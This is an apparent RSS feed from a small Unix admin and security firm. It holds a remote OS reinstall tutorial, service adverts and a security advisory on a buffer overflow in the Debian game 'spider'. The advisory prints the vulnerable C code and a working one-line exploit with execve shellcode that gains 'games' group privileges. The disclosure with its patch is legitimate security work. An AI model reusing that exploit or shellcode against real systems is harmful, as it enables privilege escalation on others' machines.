<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Emuadmin - The Tech Solution For Your Business</title>
	<atom:link href="http://www.emuadmin.com/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.emuadmin.com</link>
	<description>Just another WordPress site</description>
	<lastBuildDate>Wed, 04 May 2011 12:36:25 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.0.4</generator>
		<item>
		<title>How to remotely install your OS of choice</title>
		<link>http://www.emuadmin.com/papers/oswap/</link>
		<comments>http://www.emuadmin.com/papers/oswap/#comments</comments>
		<pubDate>Sun, 06 Feb 2011 10:59:25 +0000</pubDate>
		<dc:creator>emuadm</dc:creator>
				<category><![CDATA[Papers]]></category>

		<guid isPermaLink="false">http://www.emuadmin.com/?p=242</guid>
		<description><![CDATA[Working as a remote admin I&#8217;ve often met situations where the datacenter wasn&#8217;t able to provide me with the OS I wanted. Having to chose between working with an OS that didn&#8217;t fits my needs, changing the datacenter and installing the OS I wanted I often chose the later. The following steps require strong knowledge [...]]]></description>
			<content:encoded><![CDATA[<p>Working as a remote admin I&#8217;ve often met situations<br />
where the datacenter wasn&#8217;t able to provide me with<br />
the OS I wanted. Having to chose between working with an OS<br />
that didn&#8217;t fits my needs, changing the datacenter and installing<br />
the OS I wanted I often chose the later.</p>
<div>The following steps require strong knowledge of your OS of choice<br />
it is not intended to be a step by step tutorial.</div>
<p><strong>Prerequisites</strong></p>
<p>- the installed OS must have a bootloader that can boot from a tftp server<br />
- your OS of choice must have the ability to boot with a memory resident 	file system<br />
- you must have access to a tftp server<br />
- you must have access to a system with your OS of choice installed</p>
<p><strong>RedHat to FreeBSD</strong></p>
<p>The following steps are for a FreeBSD install over RedHat<br />
but can be easily adjusted for most of the combinations<br />
- 192.168.0.3 is the ip of the RedHat server<br />
- 192.168.0.1 is the ip of a tftp server (which is the gateway for the 	 RedHat<br />
server in the same time), the tftp server and the RedHat server don&#8217;t have<br />
to be on the same network</p>
<p>1. Configuring the bootloader<br />
In this example we&#8217;re going to use  <a href="http://www.gnu.org/software/grub/grub.html">grub</a> as it supports<br />
a wide variety of OS&#8217;s<br />
- download the latest version of grub (currently 0.93)<br />
- download  <a href="http://www.emuadmin.com/contrib/software/grub/grub-0.93-stage2-builtins.diff.gz">this patch</a> to allow grub to alternatively boot two OS&#8217;s<br />
without external intervention (<a href="http://www.emuadmin.com/contrib/software/grub/grub-0.93-stage2-builtins.html">patch details</a>)<br />
- apply the patch in the grub-0.93/stage2 directory<br />
- install grub with support for your network card<br />
- configure grub to boot your current OS</p>
<div>default 1<br />
timeout 10<br />
title RedHat<br />
root (hd0,0)<br />
kernel /vmlinuz ro root=/dev/hda1<br />
initrd /initrd.img<br />
savedefault</div>
<div>Consult grub&#8217;s documentation for a proper configuration of your OS&#8217;s boot entry</div>
<p>- reboot<br />
- edit grub&#8217;s config again and add the entry for tftp boot</p>
<div>default saved<br />
timeout 10<br />
title RedHat<br />
savedefault 2<br />
root (hd0,0)<br />
kernel /vmlinuz ro root=/dev/hda1<br />
initrd /initrd.img<br />
title TFTP BOOT<br />
savedefault 1<br />
ifconfig &#8211;address=192.168.0.3 &#8211;server=192.168.0.1 			&#8211;gateway=192.168.0.1<br />
root (nd)<br />
kernel /tftpboot/kernel.gz</div>
<p>- reboot again<br />
- At this point your next reboot will boot using the TFTP BOOT entry,<br />
and in case of failure you will need an external reboot to boot it back<br />
using the installed OS</p>
<div>Booting the TFTP BOOT entry can be done without the alternative patch<br />
and without the two extra reboots, the downside of this method is<br />
that you won&#8217;t have a way to boot the installed OS in case of a failure</div>
<p>2. Compiling your kernel<br />
On a FreeBSD system compile a kernel with minimal options<br />
Be sure to include support for your network card<br />
Include the following options:<br />
options MFS<br />
options MD_ROOT<br />
options MD_ROOT_SIZE=34000 (this must be bigger or equal with the size of<br />
your root image)<br />
built your kernel:</p>
<div>cd /usr/src<br />
make buildkernel KERNCONF=YOUR_CONFIG NO_MODULES=yes</div>
<p>For more information about building custom kernels on freebsd<br />
Please see the handbook and the related man pages<br />
<a href="http://www.freebsd.org/handbook"> http://www.FreeBSD.org</a></p>
<p>3. Create the root image<br />
- creating the new file system</p>
<div>dd if=/dev/zero of=rootfs bs=4k count=5k #(20MB, adjust the values to your needs)<br />
vnconfig -s labels -c vn0 rootfs<br />
disklabel -r -w vn0 auto<br />
newfs vn0c<br />
mount /dev/vn0c /mnt/rootfs</div>
<p>- install a minimal freebsd distribution in /mnt/rootfs<br />
For tips &amp; tricks :  <a href="http://neon1.net/misc/minibsd.html"> http://neon1.net/misc/minibsd.html</a><br />
- Be sure to include sshd<br />
- Configure the network with the details of the server where<br />
this is going to be used<br />
- Add yourself an account to be able to login with ssh and su to root</p>
<p>4. Insert the root image into kernel<br />
For this you can use the write_mfs_in_kernel program which comes with freebsd.<br />
You can find it at /usr/src/release/write_mfs_in_kernel.c</p>
<div>write_mfs_in_kernel kernel rootfs<br />
gzip kernel</div>
<p>Copy kernel.gz to your tftp server</p>
<p>5. Booting minibsd<br />
- Reboot the RedHat server which will boot the kernel from the tftp server<br />
If everything went ok you should be able to ssh to the old redhat server<br />
running now your minibsd.<br />
Once logged in you can format the harddisk and install freebsd<br />
using your preferred method.</p>
<p>Enjoy.<br />
Emilian M. Ursu<br />
emu@emuadmin.com</p>
]]></content:encoded>
			<wfw:commentRss>http://www.emuadmin.com/papers/oswap/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Spider 1.1 10032004</title>
		<link>http://www.emuadmin.com/advisories/spider-1-1-10032004/</link>
		<comments>http://www.emuadmin.com/advisories/spider-1-1-10032004/#comments</comments>
		<pubDate>Sun, 06 Feb 2011 10:38:13 +0000</pubDate>
		<dc:creator>emuadm</dc:creator>
				<category><![CDATA[Advisories]]></category>

		<guid isPermaLink="false">http://www.emuadmin.com/?p=239</guid>
		<description><![CDATA[Description: Spider 1.1 buffer overflow. Summary: A vulnerability has been discovered in the game spider, an application contained in the Debian GNU/Linux distribution. The vulnerability allows a local attacker to gain elevated privileges by overflowing the -s parameter. Impact: The attacker can gain group privileges. By default &#8220;games&#8221;. Workaround: A patch can be found at [...]]]></description>
			<content:encoded><![CDATA[<p><strong>Description:</strong><br />
Spider 1.1 buffer overflow.</p>
<p><strong>Summary: </strong><br />
A vulnerability has been discovered in the game spider, an application contained in the Debian GNU/Linux distribution.<br />
The vulnerability allows a local attacker to gain elevated privileges by overflowing the -s parameter.</p>
<p><strong>Impact:</strong><br />
The attacker can gain group privileges. By default &#8220;games&#8221;.</p>
<p><strong>Workaround:</strong><br />
A patch can be found at <a href="http://www.emuadmin.com/contrib/software/spider/spider-1.1.patch"> http://www.emuadmin.com/contrib/software/spider/spider-1.1.patch</a></p>
<p><strong>Details:</strong><br />
The vulnerability is located in the file movelog.c</p>
<div>read_file(fname)<br />
char    *fname;<br />
{<br />
FILE *fp;<br />
char    buf[1024], buf2[1024];<br />
char    *dp;</p>
<p>fname = remove_newlines(fname);<br />
if ((fp = fopen(fname, &#8220;r&#8221;)) == NULL)   {<br />
(void)sprintf(buf, &#8220;Can&#8217;t open file \&#8221;%s\&#8221; for loading.&#8221;, fname);<br />
^^^^^^^^<br />
show_message(buf);<br />
return;<br />
}</p></div>
<p>sh# spider -s `perl -e &#8216;print &#8220;A&#8221; x 1045&#8242;`<br />
Program received signal SIGSEGV, Segmentation fault.<br />
Quick exploit:<br />
sh# spider -s `perl -e &#8216;print &#8220;\x90&#8243; x 987 .  &#8220;\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80&#8243;.  &#8220;\x0c\xf6\xf\xbf&#8221;&#8216;`<br />
sh# id<br />
uid=1002(gigi) gid=13(games) groups=100(users)</p>
<p><strong>Availability</strong><br />
This message and any further updates can be found at <a href="http://www.emuadmin.com/advisories/spider-1.1-10032004"> http://www.emuadmin.com/advisories/spider-1.1-10032004</a></p>
<p>Security Team<br />
security@emuadmin.com</p>
]]></content:encoded>
			<wfw:commentRss>http://www.emuadmin.com/advisories/spider-1-1-10032004/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Spider 1.1 Buffer Overflow</title>
		<link>http://www.emuadmin.com/news/spider-1-1-buffer-overflow/</link>
		<comments>http://www.emuadmin.com/news/spider-1-1-buffer-overflow/#comments</comments>
		<pubDate>Sun, 06 Feb 2011 10:35:27 +0000</pubDate>
		<dc:creator>emuadm</dc:creator>
				<category><![CDATA[News]]></category>

		<guid isPermaLink="false">http://www.emuadmin.com/?p=235</guid>
		<description><![CDATA[The security team at Emuadmin has discovered a buffer overflow in the game spider, an application installed on Debian GNU/Linux Distribution. The vulnerability allows an attacker to gain group privileges.]]></description>
			<content:encoded><![CDATA[<p>The security team at Emuadmin has discovered a buffer overflow in the game spider, an application installed on Debian GNU/Linux Distribution.<br />
The vulnerability allows an attacker to gain group privileges.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.emuadmin.com/news/spider-1-1-buffer-overflow/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Emuadmin launched GeekHosters hosting service</title>
		<link>http://www.emuadmin.com/news/emuadmin-launched-geekhosters-hosting-service/</link>
		<comments>http://www.emuadmin.com/news/emuadmin-launched-geekhosters-hosting-service/#comments</comments>
		<pubDate>Sun, 06 Feb 2011 10:34:20 +0000</pubDate>
		<dc:creator>emuadm</dc:creator>
				<category><![CDATA[News]]></category>

		<guid isPermaLink="false">http://www.emuadmin.com/?p=233</guid>
		<description><![CDATA[After several weeks of preparations, we are proud to anounce our latest website: GeekHosters. As the name and the slogan (&#8220;Hosting the Future.&#8221;) suggest, it is about our web hosting service. GeekHosters aims to serve especially end users, but resellers too. Our goal is to provide competitive hosting solutions with affordable pricing. We achieve this [...]]]></description>
			<content:encoded><![CDATA[<blockquote><p>After several weeks of preparations, we are proud to anounce our latest website: GeekHosters. As the name and the slogan (<em>&#8220;Hosting the Future.&#8221;</em>) suggest, it is about our web hosting service. GeekHosters aims to serve especially end users, but resellers too.</p>
<p>Our goal is to provide competitive hosting solutions with affordable pricing. We achieve this goal by complying to a high quality standard, which, in short, is defined by:</p>
<div>
<ul>
<li>stable Internet solutions</li>
<li>use of popular software (PHP, MySQL)</li>
<li>installing periodical updates</li>
<li>applying security patches</li>
<li>outstanding customer support</li>
</ul>
</div>
<p>So, customers do not have to worry if their scripts will run or not or if their website can be put down by an Internet attack. Moreover, we give special credit to customers suggestions, and so GeekHosters is better every day.</p>
<p>As about our infrastructure, our secure datacenters are located in USA, running high quality software meant to keep both a high performance level and a secure environment. Also our network is a 24/7 managed environment.</p>
<p>Our offer is not tailored for a particular class of customer. GeekHosters offers general purpose, industry standard web hosting featured with all common and popular software, so any webmaster will not face any incompatibility issue.</p></blockquote>
]]></content:encoded>
			<wfw:commentRss>http://www.emuadmin.com/news/emuadmin-launched-geekhosters-hosting-service/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Emuadmin running on Zope</title>
		<link>http://www.emuadmin.com/news/emuadmin-running-on-zope/</link>
		<comments>http://www.emuadmin.com/news/emuadmin-running-on-zope/#comments</comments>
		<pubDate>Sun, 06 Feb 2011 10:33:57 +0000</pubDate>
		<dc:creator>emuadm</dc:creator>
				<category><![CDATA[News]]></category>

		<guid isPermaLink="false">http://www.emuadmin.com/?p=231</guid>
		<description><![CDATA[After months of research we found Zope to be the product we were looking for. Zope is an open source web application server primarily written in the Python programming language. It features a transactional object database which can store not only content and custom data, but also dynamic HTML templates, scripts, a search engine, and [...]]]></description>
			<content:encoded><![CDATA[<blockquote><p>After months of research we found <a href="http://www.zope.org/">Zope</a> to be the product we were looking for. Zope is an open source web application server primarily written in the Python programming language. It features a transactional object database which can store not only content and custom data, but also dynamic HTML templates, scripts, a search engine, and relational database (RDBMS) connections and code. It features a strong through-the-web development model, allowing you to update your web site from anywhere in the world.<br />
We want to use this occasion to thank the Zope team for this great product.</p></blockquote>
]]></content:encoded>
			<wfw:commentRss>http://www.emuadmin.com/news/emuadmin-running-on-zope/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Website released</title>
		<link>http://www.emuadmin.com/news/website-released/</link>
		<comments>http://www.emuadmin.com/news/website-released/#comments</comments>
		<pubDate>Sun, 06 Feb 2011 10:33:28 +0000</pubDate>
		<dc:creator>emuadm</dc:creator>
				<category><![CDATA[News]]></category>

		<guid isPermaLink="false">http://www.emuadmin.com/?p=229</guid>
		<description><![CDATA[After over one year of serving you, we are glad to announce our first form of Emuadmin&#8217;s presence on the web. Along the time many of you asked why we don&#8217;t have a website and my answer has always been the same. My belief has always been that not the look of a website makes [...]]]></description>
			<content:encoded><![CDATA[<blockquote><p>After over one year of serving you, we are glad to announce our first form of Emuadmin&#8217;s presence on the web. Along the time many of you asked why we don&#8217;t have a website and my answer has always been the same. My belief has always been that not the look of a website makes the quality of a service. I prefered offering a quality service to putting time in a website The question that you&#8217;re all going to ask now is &#8220;So why a website now ?&#8221; Well, along with the growth of our company it become more and more hard to get in touch with each one of you, and I feel that this presence its more and more of a need.<br />
Thank you for your time in reading this and I hope we&#8217;ll get the privilege to serve your business.</p></blockquote>
]]></content:encoded>
			<wfw:commentRss>http://www.emuadmin.com/news/website-released/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Security Patches</title>
		<link>http://www.emuadmin.com/services/security_services/security-patches/</link>
		<comments>http://www.emuadmin.com/services/security_services/security-patches/#comments</comments>
		<pubDate>Sun, 06 Feb 2011 10:29:14 +0000</pubDate>
		<dc:creator>emuadm</dc:creator>
				<category><![CDATA[Security Services]]></category>

		<guid isPermaLink="false">http://www.emuadmin.com/?p=225</guid>
		<description><![CDATA[Common popular software is always monitored by hackers, in order to find exploits, which when used will cause damage on a host running that software. Application developers are constantly develop updates, attempting to fix these software holes, but there lots of ways to bring down the application. Emuadmin develops and offers custom security patches which [...]]]></description>
			<content:encoded><![CDATA[<p><img class="alignright size-full wp-image-214" title="security" src="http://www.emuadmin.com/wp-content/uploads/security.gif" alt="" width="229" height="287" />Common popular software is always monitored by hackers, in order to find exploits, which when used will cause damage on a host running that software. Application developers are constantly develop updates, attempting to fix these software holes, but there lots of ways to bring down the application.</p>
<p>Emuadmin develops and offers custom security patches which will minimize the risks of a  potential attack upon your Internet hosts. We support all UNIX-like software, from Web servers to DNS, SSH, FTP etc. servers.</p>
<p>In the area of security patching, Emuadmin offers:</p>
<ul type="square">
<li>24/7 live support</li>
<li>periodical updates</li>
<li>performance optimization</li>
<li>custom plug-ins</li>
<li>troubleshooting</li>
</ul>
]]></content:encoded>
			<wfw:commentRss>http://www.emuadmin.com/services/security_services/security-patches/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Intrusion Detection Systems</title>
		<link>http://www.emuadmin.com/services/security_services/intrusion_detection_systems/</link>
		<comments>http://www.emuadmin.com/services/security_services/intrusion_detection_systems/#comments</comments>
		<pubDate>Sun, 06 Feb 2011 10:28:19 +0000</pubDate>
		<dc:creator>emuadm</dc:creator>
				<category><![CDATA[Security Services]]></category>

		<guid isPermaLink="false">http://www.emuadmin.com/?p=222</guid>
		<description><![CDATA[Intrusion detection systems (IDS) are meant to alert the system maintainer, when an intrusion occurs. If it is possible, termination of the attack is done, in order to secure the server, before damage is done. Emuadmin is specialized in IDS, always able and willing to secure your server either by using a popular product, either [...]]]></description>
			<content:encoded><![CDATA[<p><img class="alignright size-full wp-image-214" title="security" src="http://www.emuadmin.com/wp-content/uploads/security.gif" alt="" width="229" height="287" />Intrusion detection systems (IDS) are meant to alert the system maintainer, when an intrusion occurs. If it is possible, termination of the attack is done, in order to secure the server, before damage is done.</p>
<p>Emuadmin is specialized in IDS, always able and willing to secure your server either by using a popular product, either by developing a custom IDS, tailored for your business needs.</p>
<p>In the area of IDS, Emuadmin offers:</p>
<p>* 24/7 live support<br />
* periodical updates<br />
* performance optimization<br />
* custom plug-ins<br />
* troubleshooting</p>
]]></content:encoded>
			<wfw:commentRss>http://www.emuadmin.com/services/security_services/intrusion_detection_systems/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Custom Firewall</title>
		<link>http://www.emuadmin.com/services/security_services/custom-firewall/</link>
		<comments>http://www.emuadmin.com/services/security_services/custom-firewall/#comments</comments>
		<pubDate>Sun, 06 Feb 2011 10:26:04 +0000</pubDate>
		<dc:creator>emuadm</dc:creator>
				<category><![CDATA[Security Services]]></category>

		<guid isPermaLink="false">http://www.emuadmin.com/?p=217</guid>
		<description><![CDATA[Emuadmin develops custom firewall solutions tailored to your business needs. We either use a popular software you demand, either develop a firewall software that will fit your needs. Firewalls will work exactly as intended, blocking incoming our outgoing traffic that you do not desire on particular Net services (ssh, ftp, web, dns etc.) or for [...]]]></description>
			<content:encoded><![CDATA[<p><img class="alignright size-full wp-image-214" title="security" src="http://www.emuadmin.com/wp-content/uploads/security.gif" alt="" width="229" height="287" />Emuadmin develops custom firewall solutions tailored to your business needs. We either use a popular software you demand, either develop a firewall software that will fit your needs.</p>
<p>Firewalls will work exactly as intended, blocking incoming our outgoing traffic that you do not desire on particular Net services (ssh, ftp, web, dns etc.) or for specific Internet hosts that can cause damage or are traffic consumers.</p>
<p>Emuadmin supports all UNIX-like platforms, such as Linux, FreeBSD, OpenBSD, NetBSD, Solaris etc.</p>
<p>In the area of custom firewalls, Emuadmin offers:</p>
<ul type="square">
<li>24/7 live support</li>
<li>periodical updates</li>
<li>performance optimization</li>
<li>custom plug-ins</li>
<li>troubleshooting</li>
</ul>
]]></content:encoded>
			<wfw:commentRss>http://www.emuadmin.com/services/security_services/custom-firewall/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Server security audit</title>
		<link>http://www.emuadmin.com/services/security_services/auditing/</link>
		<comments>http://www.emuadmin.com/services/security_services/auditing/#comments</comments>
		<pubDate>Sun, 06 Feb 2011 10:25:12 +0000</pubDate>
		<dc:creator>emuadm</dc:creator>
				<category><![CDATA[Security Services]]></category>

		<guid isPermaLink="false">http://www.emuadmin.com/?p=213</guid>
		<description><![CDATA[Server security is well represented in our expertise areas. Emuadmin is specialized in current security trends on the Internet, and our experience enables us to identify potential threats that might bring down your Internet hosts. We offer full security auditing services for all UNIX-like operating systems (such as Linux, FreeBSD, Solaris etc.) and for all [...]]]></description>
			<content:encoded><![CDATA[<p><img class="alignright size-full wp-image-214" title="security" src="http://www.emuadmin.com/wp-content/uploads/security.gif" alt="" width="229" height="287" />Server security is well represented in our expertise areas. Emuadmin is specialized in current security trends on the Internet, and our experience enables us to identify potential threats that might bring down your Internet hosts.</p>
<p>We offer full security auditing services for all UNIX-like operating systems (such as Linux, FreeBSD, Solaris etc.) and for all Internet services.</p>
<p>In the area of security auditing, Emuadmin offers:</p>
<ul type="square">
<li>24/7 live support</li>
<li>threat identification and termination</li>
<li>periodical check</li>
<li>performance optimization</li>
<li>troubleshooting</li>
</ul>
]]></content:encoded>
			<wfw:commentRss>http://www.emuadmin.com/services/security_services/auditing/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
